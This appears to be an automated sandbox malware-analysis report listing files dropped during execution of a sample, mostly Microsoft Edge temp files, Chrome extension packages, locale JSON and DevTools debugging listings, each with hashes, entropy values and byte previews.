                                                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/AC0547A737D75439EDB69F9AF3F6C2E6",.. "id": "AC0547A737D75439EDB69F9AF3F6C2E6",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/AC0547A737D75439EDB69F9AF3F6C2E6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9D600FB4572B8B97CACBB6920872FE21",.. "id": "9D600FB4572B8B97CACBB6920872FE21",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9D600FB4572B8B97CACBB6920872FE21"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.372900845607154
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:SfNaoCuK1TECuLfNaoCcCzfNaoCIAZLCIBfNaoCZN+Zv0UrU0U8CZH:6NnCNTEC8NnCcCrNnCIAZLCIdNnCZN+K
                                                                                                                                                                                                                                                                                                MD5:5BF1E126B870669053B3C41A35E88FB7
                                                                                                                                                                                                                                                                                                SHA1:E96CE70C10AA52A02425286B4DBFEB3F17693769
                                                                                                                                                                                                                                                                                                SHA-256:D9EB9F9D857F0C999F6CB71DA61C823A7E633FAD16493122C73A3C9C4D696E71
                                                                                                                                                                                                                                                                                                SHA-512:5043D5CE3AE9F708A9A0B04B1EB2D333C5F5FE91B8A0EAB92EFEBEE9DFD160EEBDA7CBF27859BF890A0256CCE1F6A229D5A5F047B9BA3B95B9A538DA9C8E143F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9342920F61A5D3BCC349E21DD9980958",.. "id": "9342920F61A5D3BCC349E21DD9980958",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9342920F61A5D3BCC349E21DD9980958"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5A099DDCA11BCF4A15B05755F3B5AB94",.. "id": "5A099DDCA11BCF4A15B05755F3B5AB94",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5A099DDCA11BCF4A15B05755F3B5AB94"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\01e7cc52-312d-41c1-a817-87be6e3048ce.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1571509
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.991887046441072
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:24576:NeBIUKcBUMcFDECxPYhQT5T4yUzLy1mfi5olodFsB7JU8HSaf2skMnBKyPjLu:3UKC2DNIQTh4LHy1mfixbsBNHxkMnFnu
                                                                                                                                                                                                                                                                                                MD5:B3D60BC6D62A05309C68CE12D83F3388
                                                                                                                                                                                                                                                                                                SHA1:59279A995E8E1B16C81AE8B5BC20EB39B098EBC0
                                                                                                                                                                                                                                                                                                SHA-256:04D2A2278E1E32C7491A2F660A0ECAD802EE48953A334A34ADE4D804F544BA77
                                                                                                                                                                                                                                                                                                SHA-512:956D9B6508A7D0C7506070C6BDC90ACE1A81041AE6BC70D0B2ABC52BA1F4F3A28D70213E531D077D8964F994B2EBAF92B3A934A47618DFA8FA5B81CFF27E6FD5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A..*.v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~..*.DZ..Q.[L*..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./...*...LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0*r`..aP.r..3.8)A..AR.....S$y.*{.\..*..!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G....*.\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\0b0ad10c-6526-4084-a2a7-6a614dd0a9f0.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):76314
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                                                                                                MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                                                                                                SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                                                                                                SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                                                                                                SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...........}io.8..w... @*..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C*...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r||z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3f52a581-d518-4928-bbb9-be22a9cae51b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\47c936d8-df10-4f8c-a2b4-8333b41a739d.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\50cb1f38-ee40-4f55-9722-d580dd1df5fe.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bc9e7a20-5de3-4fac-9976-5d1a39759799.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.412002950787627
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0Uw5fX0Uu5M:JIVuwEw5MUFZLBQLtQ0M
                                                                                                                                                                                                                                                                                                MD5:0677D7DA600FEB5C6FE94C606191E6F8
                                                                                                                                                                                                                                                                                                SHA1:C3BFC7907C418D26F66B2A1A3677BA1A594B4211
                                                                                                                                                                                                                                                                                                SHA-256:457E17CA061E1956C487E5689F3BEA8AE59BBDEB532007E624F18720701FABD4
                                                                                                                                                                                                                                                                                                SHA-512:759BEF56ABAAF215057F21FA16A0F24662C208714E1094E375BDE8F322AA47B71D82AEDD527A62D1B7FFFC34393045C4D49F94732064AC278E5DBB6AFC2AD8EB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e5893cbc-238b-46ed-b6a1-cf5c5e75cd77.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\50cb1f38-ee40-4f55-9722-d580dd1df5fe.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                Encrypted:false
